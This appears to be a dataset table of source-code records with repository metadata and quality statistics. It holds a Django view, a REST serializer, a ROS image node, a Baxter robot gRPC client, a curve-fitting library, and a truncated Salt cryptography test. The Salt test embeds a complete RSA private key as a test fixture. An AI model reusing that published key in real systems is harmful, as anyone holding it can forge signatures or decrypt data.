hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
82a5daea9d746a5e0fd1a18fd73ba8a7a242e08f | 612 | py | Python | web_app/cornwall/views.py | blackradley/heathmynd | 4495f8fadef9d3a36a7d5b49fae2b61cceb158bc | [
"MIT"
] | null | null | null | web_app/cornwall/views.py | blackradley/heathmynd | 4495f8fadef9d3a36a7d5b49fae2b61cceb158bc | [
"MIT"
] | 4 | 2018-11-06T16:15:10.000Z | 2018-11-07T12:03:09.000Z | web_app/cornwall/views.py | blackradley/heathmynd | 4495f8fadef9d3a36a7d5b49fae2b61cceb158bc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" test """
from __future__ import unicode_literals
from django.template.loader import get_template
from django.contrib import messages
# Create your views here.
from django.http import HttpResponse
def index(request):
""" index """
template = get_template('cornwall/index.html')
messages.set_level(request, messages.DEBUG)
list(messages.get_messages(request))# clear out the previous messages
messages.add_message(request, messages.INFO, 'Hello world.')
context = {'nbar': 'cornwall'}
html = template.render(context, request)
return HttpResponse(html)
| 32.210526 | 73 | 0.730392 | 75 | 612 | 5.826667 | 0.573333 | 0.06865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001927 | 0.151961 | 612 | 18 | 74 | 34 | 0.840077 | 0.148693 | 0 | 0 | 0 | 0 | 0.08498 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
82b549e4607fd2be9e74cf5b94bf6e0c4162ac8a | 1,198 | py | Python | src/user_auth_api/serializers.py | Adstefnum/mockexams | af5681b034334be9c5aaf807161ca80a8a1b9948 | [
"BSD-3-Clause"
] | null | null | null | src/user_auth_api/serializers.py | Adstefnum/mockexams | af5681b034334be9c5aaf807161ca80a8a1b9948 | [
"BSD-3-Clause"
] | null | null | null | src/user_auth_api/serializers.py | Adstefnum/mockexams | af5681b034334be9c5aaf807161ca80a8a1b9948 | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from user_auth_api.models import User
# User Serializer
class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = [
            'user_name',
            'email',
            'current_jamb_score',
            'phone_num',
            'last_name',
            'first_name',
            'is_staff',
            'is_superuser',
            'uuid',
            'is_active',
            'last_login',
            'date_joined',
        ]
# Register Serializer
class RegisterSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = [
            'user_name',
            'email',
            'password',
            'current_jamb_score',
            'phone_num',
            'last_name',
            'first_name',
            'uuid',
        ]
        extra_kwargs = {'password': {'write_only': True}}

    def create(self, validated_data):
        user = User.objects.create_user(
            validated_data['user_name'],
            validated_data['email'], validated_data['current_jamb_score'],
            validated_data['phone_num'], validated_data['password'],
            validated_data['last_name'], validated_data['first_name']
        )
        return user | 22.603774 | 73 | 0.576795 | 116 | 1,198 | 5.637931 | 0.413793 | 0.159021 | 0.073395 | 0.107034 | 0.318043 | 0.318043 | 0.318043 | 0.318043 | 0.318043 | 0.192661 | 0 | 0 | 0.310518 | 1,198 | 53 | 74 | 22.603774 | 0.791768 | 0.029215 | 0 | 0.487805 | 0 | 0 | 0.234281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0.073171 | 0.04878 | 0 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
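The `create` override above threads seven `validated_data` fields into `create_user` positionally, so the argument order must exactly match the manager's signature. A safer pattern is to pop the write-only password and forward everything else by keyword; the sketch below uses a hypothetical stand-in for Django's `User.objects.create_user` (invented for the example, since the project's models are not available here):

```python
# Hypothetical stand-in for User.objects.create_user: keyword
# arguments remove any dependence on positional ordering.
def create_user(user_name, email, password=None, **extra_fields):
    user = {"user_name": user_name, "email": email, **extra_fields}
    user["password_hash"] = hash(password)  # placeholder for real hashing
    return user


def create(validated_data):
    # pop the write-only field, forward the rest by name
    password = validated_data.pop("password")
    return create_user(password=password, **validated_data)


data = {"user_name": "ada", "email": "ada@example.com",
        "password": "s3cret", "phone_num": "123"}
user = create(dict(data))
```

With keywords, adding or reordering serializer fields cannot silently swap two arguments the way a positional call can.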
82b593a5d04b8635ad9d0bfca619ad7a94f582c9 | 2,671 | py | Python | cv_utils/cv_util_node.py | OAkyildiz/cibr_img_processing | 69f3293db80e9c0ae57369eaf2885b94adb330df | [
"MIT"
] | null | null | null | cv_utils/cv_util_node.py | OAkyildiz/cibr_img_processing | 69f3293db80e9c0ae57369eaf2885b94adb330df | [
"MIT"
] | null | null | null | cv_utils/cv_util_node.py | OAkyildiz/cibr_img_processing | 69f3293db80e9c0ae57369eaf2885b94adb330df | [
"MIT"
] | null | null | null | import sys
import rospy
import types
#from std_msgs.msg import String
from sensor_msgs.msg import Image
from cibr_img_processing.msg import Ints
from cv_bridge import CvBridge, CvBridgeError
#make int msgs
#TODO: get the img size from camera_info topics
class CVUtilNode:  # abstract this; it can easily work with other cv_utils and be an image bbm_node
    def __init__(self, util, name="cv_util_node", pub_topic=False):
        #self.obj_pub = rospy.Publisher("image_topic_2", ***)
        self.bridge = CvBridge()
        self.util = util
        self.name = name
        rospy.init_node(self.name, anonymous=True)
        self.rate = rospy.Rate(30)
        self.image_sub = rospy.Subscriber("image_topic", Image, self.callback)
        self.result_pub = rospy.Publisher("results", Ints, queue_size=10)  # always publish data
        self.result_msgs = [-1, -1, -1]  # make int msgs
        self.pubs = []  # extra publishers attached via attach_pub()
        self.subs = []
        if pub_topic:
            self.image_pub = rospy.Publisher(pub_topic, Image, queue_size=10)
            # do stuff with img.pub

    def callback(self, data):
        try:
            self.util.hook(self.bridge.imgmsg_to_cv2(data, "bgr8"))
        except CvBridgeError as e:
            print(e)

    def data_pub(self):
        self.result_pub.publish(self.util.results)  # try/except

    def img_pub(self, cv_image):  # to handle converting from OpenCV to ROS
        try:
            self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
        except CvBridgeError as e:
            print(e)

    def run(self):
        self.util.init_windows()
        while not rospy.is_shutdown():
            try:
                if self.util.loop():
                    break
                if -1 not in self.util.results and self.util._publish:
                    self.data_pub()
                    self.util._publish = 0
                # if self.util._publish:
                #     for pub in self.pubs:
                #         pub.publish
                #self.rate.sleep()
            except KeyboardInterrupt:
                self.util.shutdown()
        self.util.shutdown()

    # adds a publisher to the list of extra publishers
    def attach_pub(self, topic, msg_type):
        self.pubs.append(rospy.Publisher(topic, msg_type, queue_size=1))
        # TODO: attach structs of publisher and message template instead
        # so it is iterable together
        # pubs.pub = ...  pubs.msg = type()

    def attach_sub(self, topic, msg_type, cb_handle):
        self.subs.append(rospy.Subscriber(topic, msg_type, cb_handle))

    def attach_controls(self, fun_handle):
        # bind the method to the instance
        self.util.external_ops = types.MethodType(fun_handle, self.util)
| 33.810127 | 98 | 0.622613 | 359 | 2,671 | 4.48468 | 0.356546 | 0.069565 | 0.031677 | 0.031056 | 0.043478 | 0.043478 | 0.043478 | 0.043478 | 0 | 0 | 0 | 0.00937 | 0.280794 | 2,671 | 78 | 99 | 34.24359 | 0.828735 | 0.217896 | 0 | 0.18 | 0 | 0 | 0.018357 | 0 | 0 | 0 | 0 | 0.012821 | 0 | 1 | 0.16 | false | 0.02 | 0.12 | 0 | 0.3 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
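`attach_controls` above relies on `types.MethodType` to graft a plain function onto the util object at runtime. A minimal standalone illustration of that binding trick — the `Util` class and `custom_ops` function here are invented for the demo:

```python
import types


class Util:
    def __init__(self):
        self.gain = 2

    def external_ops(self):
        # default hook; meant to be replaced at runtime
        return 0


def custom_ops(self):
    # once bound, `self` is the Util instance
    return self.gain * 10


util = Util()
# bind the free function as a method of this one instance,
# mirroring attach_controls() in the node above
util.external_ops = types.MethodType(custom_ops, util)
```

Because the binding is per-instance, other `Util` objects keep the default `external_ops`.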
82e0abe3e486e3352d2b626c47850728c42c4ae5 | 2,719 | py | Python | robot_con/baxter/baxter_client.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 23 | 2021-04-02T09:02:04.000Z | 2022-03-22T05:31:03.000Z | robot_con/baxter/baxter_client.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 35 | 2021-04-12T09:41:05.000Z | 2022-03-26T13:32:46.000Z | robot_con/baxter/baxter_client.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 16 | 2021-03-30T11:55:45.000Z | 2022-03-30T07:10:59.000Z | import robotconn.rpc.baxterrobot.baxter_server_pb2 as bxtsp
import robotconn.rpc.baxterrobot.baxter_server_pb2_grpc as bxtspgc
import grpc
import pickle
import numpy as np
class BaxterClient(object):
    def __init__(self, host="localhost:18300"):
        channel = grpc.insecure_channel(host)
        self.stub = bxtspgc.BaxterServerStub(channel)

    def bxt_set_gripper(self, pos=100, armname="rgt"):
        self.stub.bxt_set_gripper(bxtsp.Gripper_pos_armname(pos=pos, armname=armname))

    def bxt_get_gripper(self, armname="rgt"):
        return self.stub.bxt_get_gripper(bxtsp.Armname(armname=armname))

    def bxt_get_jnts(self, armname="rgt"):
        jnts = pickle.loads(self.stub.bxt_get_jnts(bxtsp.Armname(armname=armname)).jnt_angles)
        jnts = [jnts["right_s0"], jnts["right_s1"], jnts["right_e0"], jnts["right_e1"], jnts["right_w0"], jnts["right_w1"], jnts["right_w2"]] \
            if armname == "rgt" else [jnts["left_s0"], jnts["left_s1"], jnts["left_e0"], jnts["left_e1"], jnts["left_w0"], jnts["left_w1"], jnts["left_w2"]]
        jnts = [np.rad2deg(jnt) for jnt in jnts]
        return jnts

    def bxt_movejnts(self, jnt_angles=[], speed=.5, armname="rgt"):
        self.stub.bxt_movejnts(bxtsp.Jnt_angles_armname(jnt_angles=np.array(jnt_angles, dtype="float").tobytes(), speed=speed, armname=armname))

    def bxt_movejnts_cont(self, jnt_angles_list=[], speed=.2, armname="rgt"):
        self.stub.bxt_movejnts_cont(bxtsp.Jnt_angles_armname(jnt_angles=np.array(jnt_angles_list, dtype="float").tobytes(), speed=speed, armname=armname))

    def bxt_get_force(self, armname):
        return np.frombuffer(self.stub.bxt_get_force(bxtsp.Armname(armname=armname)).list).tolist()

    def bxt_get_image(self, camera_name):
        image = self.stub.bxt_get_image(bxtsp.Camera_name(name=camera_name)).list
        image = np.frombuffer(image)
        image = np.reshape(image, (200, 320, 3)).astype("uint8")
        # image = image[:,:,1]
        return image


if __name__ == "__main__":
    import time
    bc = BaxterClient(host="10.1.0.24:18300")
    # tic = time.time()
    # imgx = hcc.getimgbytes()
    # toc = time.time()
    # td = toc-tic
    # tic = time.time()
    # imgxs = hcc.getimgstr()
    # toc = time.time()
    # td2 = toc-tic
    # print(td, td2)
    angle_rgt = bc.bxt_get_jnts("rgt")
    # print(angle_rgt)
    # print(angle_rgt[-1])
    #
    # angle_rgt[-1] = angle_rgt[-1] - 50.0
    #
    # bc.bxt_movejnts(angle_rgt)
    print(bc.bxt_get_jnts(armname="rgt"))
    print(bc.bxt_get_jnts(armname="lft"))
    import cv2 as cv
    cv.imshow("w", bc.bxt_get_image("head_camera"))
    cv.waitKey(0)
    # print(bc.bxt_get_jnts("rgt"))
# print(eval("a="+bc.bxt_get_jnts())) | 38.842857 | 154 | 0.668996 | 397 | 2,719 | 4.34005 | 0.261965 | 0.048752 | 0.04469 | 0.034823 | 0.306442 | 0.262914 | 0.190366 | 0.107951 | 0.107951 | 0.053395 | 0 | 0.025367 | 0.173593 | 2,719 | 70 | 155 | 38.842857 | 0.741433 | 0.128724 | 0 | 0 | 0 | 0 | 0.08383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | false | 0 | 0.179487 | 0.051282 | 0.512821 | 0.051282 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82e4981e82370f4b216afc9af7f4136625ccd93f | 3,644 | py | Python | fit1d/common/fit1d.py | michael-amat/fit1d | 0cd42874e3eba4353c564809c317510b626dee25 | [
"BSD-2-Clause"
] | null | null | null | fit1d/common/fit1d.py | michael-amat/fit1d | 0cd42874e3eba4353c564809c317510b626dee25 | [
"BSD-2-Clause"
] | null | null | null | fit1d/common/fit1d.py | michael-amat/fit1d | 0cd42874e3eba4353c564809c317510b626dee25 | [
"BSD-2-Clause"
] | 9 | 2019-02-24T12:51:28.000Z | 2019-03-22T09:25:45.000Z | """
fit1d package is designed to provide an organized toolbox for different types of
1D fits that can be performed.
It is easy to add new fits and other functionalities
"""
from abc import ABC, abstractmethod
import numpy as np
from typing import List,Tuple
from fit1d.common.model import Model, ModelMock
from fit1d.common.outlier import OutLier
from fit1d.common.fit_data import FitData
class Fit1D(ABC):
"""
This is the main class of the fit1d package. It is used to allow the user to execute
fit and eval methods, in addition to calc_RMS and calc_error static services.
The properties of this class are the _model and _outlier objects and a _use_remove_outliers
boolean
"""
_outlier: OutLier
_use_remove_outliers: bool
_fit_data: FitData
# interface methods
def fit(self, x: np.ndarray, y: np.ndarray) -> FitData:
self._fit_data.x = x
self._fit_data.y = y
if self._use_remove_outliers:
self._remove_outlier()
else:
self._calc_fit_and_update_fit_data()
return self._fit_data
def eval(self, x: np.ndarray = None, model: Model = None) -> np.ndarray:
if x is not None:
self._fit_data.x = x
if model is not None:
self._fit_data.model = model
self._calc_eval()
return self._fit_data.y_fit
def calc_error(self):
"""
calc error vector , update _fit_data
:return:
"""
if self._fit_data.y is not None and self._fit_data.y_fit is not None:
self._fit_data.error_vector = self._fit_data.y - self._fit_data.y_fit
def calc_rms(self):
if self._fit_data.error_vector is not None:
self._fit_data.rms = (sum(self._fit_data.error_vector ** 2) / len(self._fit_data.error_vector)) ** 0.5
def get_fit_data(self) -> FitData:
return self._fit_data
# abstract methods
@abstractmethod
def _calc_fit(self):
"""
abstractmethod:
run fit calculation of the data update model in _fit_data.model
:return: Null
"""
pass
@abstractmethod
def _calc_eval(self):
"""
abstractmethod:
subclass calculate model eval for inner x and model
update _fit_data.y_fit
:return: Void
"""
pass
# internal methods
def _update_fit_data(self):
self._calc_eval()
self.calc_error()
self.calc_rms()
def _remove_outlier(self):
while True:
self._calc_fit_and_update_fit_data()
indexes_to_remove = self._outlier.find_outliers(self._fit_data.error_vector)
if len(indexes_to_remove) == 0:
break
else:
self._remove_indexes(indexes_to_remove)
def _remove_indexes(self, ind):
self._fit_data.x = np.delete(self._fit_data.x, ind)
self._fit_data.y = np.delete(self._fit_data.y, ind)
def _calc_fit_and_update_fit_data(self):
self._calc_fit()
self._update_fit_data()
class Fit1DMock(Fit1D):
""" Mock class. Used only for tests """
def __init__(self, outlier: OutLier, remove_outliers: bool):
self._fit_data = FitData()
self._outlier = outlier
self._use_remove_outliers = remove_outliers
def _calc_fit(self):
self._fit_data.model = ModelMock({"param1": 5.5})
def _calc_eval(self) -> np.ndarray:
if self._fit_data.y is None or len(self._fit_data.y) == 4:
self._fit_data.y_fit = np.array([11, 22, 33, 44])
else:
self._fit_data.y_fit = np.array([11, 33, 44])
| 30.366667 | 114 | 0.638035 | 518 | 3,644 | 4.183398 | 0.227799 | 0.12275 | 0.137056 | 0.066451 | 0.223812 | 0.146747 | 0.067374 | 0.02215 | 0 | 0 | 0 | 0.011751 | 0.27607 | 3,644 | 119 | 115 | 30.621849 | 0.809704 | 0.208013 | 0 | 0.246377 | 0 | 0 | 0.002202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.202899 | false | 0.028986 | 0.086957 | 0.014493 | 0.405797 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
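`_remove_outlier` above iterates fit → error → prune until `find_outliers` returns nothing. A self-contained sketch of the same loop, using a plain mean as the "model" and a fixed residual threshold in place of the package's `OutLier` object (both substitutions are illustrative, not part of fit1d):

```python
from statistics import mean


def fit_with_outlier_removal(y, threshold=10.0):
    """Iteratively fit a constant model (the mean) and drop points
    whose absolute residual exceeds `threshold`.
    Assumes at least one inlier survives each pass."""
    y = list(y)
    while True:
        model = mean(y)                      # stands in for _calc_fit
        errors = [v - model for v in y]      # stands in for calc_error
        drop = [i for i, e in enumerate(errors) if abs(e) > threshold]
        if not drop:                         # find_outliers returned nothing
            return model, y
        y = [v for i, v in enumerate(y) if i not in drop]  # _remove_indexes


model, kept = fit_with_outlier_removal([10, 11, 9, 10, 50])
```

The first pass fits through the outlier (mean 18), drops the 50, and the second pass converges on the inliers.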
7d53f22522d63caa5e1b6eeef4ed280bfe59205b | 5,646 | py | Python | tests/unit/test_crypt.py | oba11/salt | ddc0286d57c5ce864b60bf43e5bc3007bf7c2549 | [
"Apache-2.0"
] | null | null | null | tests/unit/test_crypt.py | oba11/salt | ddc0286d57c5ce864b60bf43e5bc3007bf7c2549 | [
"Apache-2.0"
] | null | null | null | tests/unit/test_crypt.py | oba11/salt | ddc0286d57c5ce864b60bf43e5bc3007bf7c2549 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# python libs
from __future__ import absolute_import
import os
# salt testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.mock import patch, call, mock_open, NO_MOCK, NO_MOCK_REASON, MagicMock
# salt libs
import salt.utils
import salt.utils.files
from salt import crypt
# third-party libs
try:
    from Cryptodome.PublicKey import RSA  # pylint: disable=unused-import
    HAS_PYCRYPTO_RSA = True
except ImportError:
    HAS_PYCRYPTO_RSA = False

if not HAS_PYCRYPTO_RSA:
    try:
        from Crypto.PublicKey import RSA
        HAS_PYCRYPTO_RSA = True
    except ImportError:
        HAS_PYCRYPTO_RSA = False
PRIVKEY_DATA = (
'-----BEGIN RSA PRIVATE KEY-----\n'
'MIIEpAIBAAKCAQEA75GR6ZTv5JOv90Vq8tKhKC7YQnhDIo2hM0HVziTEk5R4UQBW\n'
'a0CKytFMbTONY2msEDwX9iA0x7F5Lgj0X8eD4ZMsYqLzqjWMekLC8bjhxc+EuPo9\n'
'Dygu3mJ2VgRC7XhlFpmdo5NN8J2E7B/CNB3R4hOcMMZNZdi0xLtFoTfwU61UPfFX\n'
'14mV2laqLbvDEfQLJhUTDeFFV8EN5Z4H1ttLP3sMXJvc3EvM0JiDVj4l1TWFUHHz\n'
'eFgCA1Im0lv8i7PFrgW7nyMfK9uDSsUmIp7k6ai4tVzwkTmV5PsriP1ju88Lo3MB\n'
'4/sUmDv/JmlZ9YyzTO3Po8Uz3Aeq9HJWyBWHAQIDAQABAoIBAGOzBzBYZUWRGOgl\n'
'IY8QjTT12dY/ymC05GM6gMobjxuD7FZ5d32HDLu/QrknfS3kKlFPUQGDAbQhbbb0\n'
'zw6VL5NO9mfOPO2W/3FaG1sRgBQcerWonoSSSn8OJwVBHMFLG3a+U1Zh1UvPoiPK\n'
'S734swIM+zFpNYivGPvOm/muF/waFf8tF/47t1cwt/JGXYQnkG/P7z0vp47Irpsb\n'
'Yjw7vPe4BnbY6SppSxscW3KoV7GtJLFKIxAXbxsuJMF/rYe3O3w2VKJ1Sug1VDJl\n'
'/GytwAkSUer84WwP2b07Wn4c5pCnmLslMgXCLkENgi1NnJMhYVOnckxGDZk54hqP\n'
'9RbLnkkCgYEA/yKuWEvgdzYRYkqpzB0l9ka7Y00CV4Dha9Of6GjQi9i4VCJ/UFVr\n'
'UlhTo5y0ZzpcDAPcoZf5CFZsD90a/BpQ3YTtdln2MMCL/Kr3QFmetkmDrt+3wYnX\n'
'sKESfsa2nZdOATRpl1antpwyD4RzsAeOPwBiACj4fkq5iZJBSI0bxrMCgYEA8GFi\n'
'qAjgKh81/Uai6KWTOW2kX02LEMVRrnZLQ9VPPLGid4KZDDk1/dEfxjjkcyOxX1Ux\n'
'Klu4W8ZEdZyzPcJrfk7PdopfGOfrhWzkREK9C40H7ou/1jUecq/STPfSOmxh3Y+D\n'
'ifMNO6z4sQAHx8VaHaxVsJ7SGR/spr0pkZL+NXsCgYEA84rIgBKWB1W+TGRXJzdf\n'
'yHIGaCjXpm2pQMN3LmP3RrcuZWm0vBt94dHcrR5l+u/zc6iwEDTAjJvqdU4rdyEr\n'
'tfkwr7v6TNlQB3WvpWanIPyVzfVSNFX/ZWSsAgZvxYjr9ixw6vzWBXOeOb/Gqu7b\n'
'cvpLkjmJ0wxDhbXtyXKhZA8CgYBZyvcQb+hUs732M4mtQBSD0kohc5TsGdlOQ1AQ\n'
'McFcmbpnzDghkclyW8jzwdLMk9uxEeDAwuxWE/UEvhlSi6qdzxC+Zifp5NBc0fVe\n'
'7lMx2mfJGxj5CnSqQLVdHQHB4zSXkAGB6XHbBd0MOUeuvzDPfs2voVQ4IG3FR0oc\n'
'3/znuwKBgQChZGH3McQcxmLA28aUwOVbWssfXKdDCsiJO+PEXXlL0maO3SbnFn+Q\n'
'Tyf8oHI5cdP7AbwDSx9bUfRPjg9dKKmATBFr2bn216pjGxK0OjYOCntFTVr0psRB\n'
'CrKg52Qrq71/2l4V2NLQZU40Dr1bN9V+Ftd9L0pvpCAEAWpIbLXGDw==\n'
'-----END RSA PRIVATE KEY-----')
PUBKEY_DATA = (
'-----BEGIN PUBLIC KEY-----\n'
'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA75GR6ZTv5JOv90Vq8tKh\n'
'KC7YQnhDIo2hM0HVziTEk5R4UQBWa0CKytFMbTONY2msEDwX9iA0x7F5Lgj0X8eD\n'
'4ZMsYqLzqjWMekLC8bjhxc+EuPo9Dygu3mJ2VgRC7XhlFpmdo5NN8J2E7B/CNB3R\n'
'4hOcMMZNZdi0xLtFoTfwU61UPfFX14mV2laqLbvDEfQLJhUTDeFFV8EN5Z4H1ttL\n'
'P3sMXJvc3EvM0JiDVj4l1TWFUHHzeFgCA1Im0lv8i7PFrgW7nyMfK9uDSsUmIp7k\n'
'6ai4tVzwkTmV5PsriP1ju88Lo3MB4/sUmDv/JmlZ9YyzTO3Po8Uz3Aeq9HJWyBWH\n'
'AQIDAQAB\n'
'-----END PUBLIC KEY-----')
MSG = b'It\'s me, Mario'
SIG = (
b'\x07\xf3\xb1\xe7\xdb\x06\xf4_\xe2\xdc\xcb!F\xfb\xbex{W\x1d\xe4E'
b'\xd3\r\xc5\x90\xca(\x05\x1d\x99\x8b\x1aug\x9f\x95>\x94\x7f\xe3+'
b'\x12\xfa\x9c\xd4\xb8\x02]\x0e\xa5\xa3LL\xc3\xa2\x8f+\x83Z\x1b\x17'
b'\xbfT\xd3\xc7\xfd\x0b\xf4\xd7J\xfe^\x86q"I\xa3x\xbc\xd3$\xe9M<\xe1'
b'\x07\xad\xf2_\x9f\xfa\xf7g(~\xd8\xf5\xe7\xda-\xa3Ko\xfc.\x99\xcf'
b'\x9b\xb9\xc1U\x97\x82\'\xcb\xc6\x08\xaa\xa0\xe4\xd0\xc1+\xfc\x86'
b'\r\xe4y\xb1#\xd3\x1dS\x96D28\xc4\xd5\r\xd4\x98\x1a44"\xd7\xc2\xb4'
b']\xa7\x0f\xa7Db\x85G\x8c\xd6\x94!\x8af1O\xf6g\xd7\x03\xfd\xb3\xbc'
b'\xce\x9f\xe7\x015\xb8\x1d]AHK\xa0\x14m\xda=O\xa7\xde\xf2\xff\x9b'
b'\x8e\x83\xc8j\x11\x1a\x98\x85\xde\xc5\x91\x07\x84!\x12^4\xcb\xa8'
b'\x98\x8a\x8a&#\xb9(#?\x80\x15\x9eW\xb5\x12\xd1\x95S\xf2<G\xeb\xf1'
b'\x14H\xb2\xc4>\xc3A\xed\x86x~\xcfU\xd5Q\xfe~\x10\xd2\x9b')
@skipIf(NO_MOCK, NO_MOCK_REASON)
